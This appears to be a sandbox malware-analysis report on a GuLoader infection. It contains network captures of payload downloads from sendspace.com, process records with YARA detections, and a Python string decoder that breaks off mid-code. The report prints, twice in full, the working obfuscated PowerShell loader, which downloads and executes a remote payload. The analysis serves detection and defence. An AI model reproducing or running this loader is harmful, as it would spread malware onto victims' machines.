                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 75 7a 63 35 46 54 7a 2b 53 54 50 46 72 4f 42 53 62 2f 72 32 57 42 32 32 69 5a 37 56 72 43 43 6f 69 52 4e 43 57 42 35 30 61 2b 62 68 6a 79 4e 32 32 71 41 6d 62 56 76 6a 6b 50 6e 32 57 6b 6b 56 39 79 6a 6a 66 71 47 34 78 77 58 63 49 2f 72 74 47 58 34 4d 47 75 66 79 50 54 66 36 6c 36 68 36 65 6c 68 66 56 72 77 4a 2f 65 66 62 71 42 6d 75 51 4f 51 4e 66 2f 33 50 47 44 77 43 41 6e 6b 4e 36 46 39 72 54 48 6b 4c 6b 72 6a 32 4b 44 42 71 61 72 2f 76 52 4a 51 4e 47 2f 43 62 75 72 42 67 79 33 4d 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 2b 34 68 67 78 6a 50 6f 33 67 30 4e 64 4c 4c 67 48 6d 73 53 6d 4c 35 75 75 6c 6c 50 61 42 33 51 62 69 59 61 4c 34 6b 76 57 78 33 76 32 38 33 51 72 42 76
                                                                                              Data Ascii: uzc5FTz+STPFrOBSb/r2WB22iZ7VrCCoiRNCWB50a+bhjyN22qAmbVvjkPn2WkkV9yjjfqG4xwXcI/rtGX4MGufyPTf6l6h6elhfVrwJ/efbqBmuQOQNf/3PGDwCAnkN6F9rTHkLkrj2KDBqar/vRJQNG/CburBgy3MoX9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erKF/X+4hgxjPo3g0NdLLgHmsSmL5uullPaB3QbiYaL4kvWx3v283QrBv


Session ID:2
Source IP:192.168.2.6
Source Port:49708
Destination IP:104.21.28.80
Destination Port:443
PID:5892
Process:C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp / Bytes transferred / Direction / Data

2024-05-23 19:03:49 UTC / 175 bytes / OUT
GET /pro/dl/6f2c5c HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache

2024-05-23 19:03:50 UTC / 952 bytes / IN
HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:03:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=8h7tvviacjavkonspru2dnmd45; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5h0mCJAWOwoSYac16L%2BNEnUDSxp%2BsWgSAShbwpcXRsk3nlW3xKLJydbumVIDTBSdYG4dKaEj0T39%2FmURpmDyBf50iN7EEWhTZAN%2BmHjVR2hvJ%2BDPLjFDDOuI3DtOYS7wwIOdvw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88874ee98d0042f2-EWR
alt-svc: h3=":443"; ma=86400

2024-05-23 19:03:50 UTC / 5 bytes / IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID:3
Source IP:192.168.2.6
Source Port:49709
Destination IP:69.31.136.17
Destination Port:443
PID:5892
Process:C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp / Bytes transferred / Direction / Data

2024-05-23 19:03:51 UTC / 306 bytes / OUT
GET /dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: fs03n5.sendspace.com
Connection: Keep-Alive
Cookie: SID=8h7tvviacjavkonspru2dnmd45

2024-05-23 19:03:51 UTC / 430 bytes / IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 19:03:51 GMT
Content-Type: application/octet-stream
Content-Length: 46144
Last-Modified: Mon, 20 May 2024 13:18:49 GMT
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="JXfZIuRPwNaOvold98.bin"
ETag: "664b4db9-b440"
Accept-Ranges: bytes



                                                                                              Target ID:0
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
                                                                                              Imagebase:0x7ff75f3f0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff66e660000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. 
N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes 
adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
                                                                                              Imagebase:0x7ff6e3d50000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:15:02:56
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff66e660000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:15:02:58
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
                                                                                              Imagebase:0x7ff75f3f0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:15:03:06
                                                                                              Start date:23/05/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. 
';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. 
N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes 
adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
                                                                                              Imagebase:0xb10000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2632762679.0000000008AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2621078427.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2632901106.0000000009FF9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true
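The command line of this powershell.exe process is the GuLoader script stage. Every string literal in it is passed through the `Ugedagens` function defined at the start: with `$Lassoing = 1` it loops `For($i=5; $i -lt Length-1; $i+=6)` and keeps `Substring($i,1)`, so each literal is five junk characters followed by one real character, repeated, with a trailing 6-character chunk that is never read. The Python below is an added worked example written for this page, not code from the Joe Sandbox report or from the sample; it reimplements that decoder and runs it on literals copied verbatim from the command line above. The regex extractor and the short sample command line it parses are this example's own assumptions. One detail worth noting: the `cmd.exe` child (Target ID 7) runs `echo %appdata%\Bevogtes140.Out && echo t`, and the script stores both output lines in `$Applausers`; the second line, the single character `t`, is what completes the `$Underabyss` literal, which `Ugedagens` otherwise leaves one character short.

```python
"""Decoder for the GuLoader string obfuscation seen in the captured command line.

Added example, not part of the Joe Sandbox report. The cover strings below are
copied verbatim from the powershell.exe command line; the regex and the sample
command line fed to decode_command_line() are assumptions of this example.
"""
import re


def ugedagens(cover: str, stride: int = 6, start: int = 5) -> str:
    """Python mirror of the captured PowerShell function:
        $Frys = $Outdure.Length - $Lassoing      # $Lassoing = 1
        For ($i = 5; $i -lt $Frys; $i += 6) { $out += $Outdure.Substring($i, 1) }
    Keeps the 6th character of every 6-char chunk and never the final character,
    so a trailing 6-char chunk is pure padding."""
    limit = len(cover) - 1
    return "".join(cover[i] for i in range(start, limit, stride))


def looks_intact(cover: str, stride: int = 6) -> bool:
    """Sanity check: every literal in this sample is a whole number of 6-char chunks.
    A literal that fails this was probably altered in transit (for example runs of
    spaces collapsed when the report was rendered) and should be re-taken from a
    raw capture of the command line before decoding."""
    return len(cover) % stride == 0


# Cover strings copied verbatim from the powershell.exe command line above.
HUACO = " Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap "
FLUERNES = ("Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke."
            " Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicero"
            "chalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4Homebe"
            "Etabl2Preenq Udadb K.st ")
ASTROGRAPHER = "Homol>Fossi "
ADENONCUS = "Afmnsi ExhoeSv,nfxInku. "
UNDERABYSS = ("Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressr"
              "Blodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec"
              " kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristt"
              "Malap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset")


def decode_page_strings() -> dict:
    """Decode the four short literals the loader defines before its main loop."""
    return {
        "Huaco": ugedagens(HUACO),                # HTTP header name sent with the download
        "Fluernes": ugedagens(FLUERNES),          # download URL (first element of $Forvay)
        "Astrographer": ugedagens(ASTROGRAPHER),  # separator handed to .Split()
        "adenoncus": ugedagens(ADENONCUS),        # command that '.' (dot-sourcing) invokes
    }


def webclient_statement(echo_output_last_line: str = "t") -> str:
    """$Underabyss decodes one character short on purpose; the loader appends
    $Applausers[1], the last line printed by `cmd /c "echo ... && echo t"`
    (Target ID 7 above), to finish the statement before executing it."""
    return ugedagens(UNDERABYSS) + echo_output_last_line


def decode_command_line(cmdline: str) -> list:
    """Pull every Ugedagens '...' literal out of a raw command line and decode it.
    The regex is this example's assumption about the call syntax used in the sample."""
    return [ugedagens(s) for s in re.findall(r"Ugedagens\s+'([^']*)'", cmdline)]


# Constructed sample: two literals from the page, not the full captured line.
SAMPLE_CMDLINE = (
    "$Astrographer=Ugedagens 'Homol>Fossi ';"
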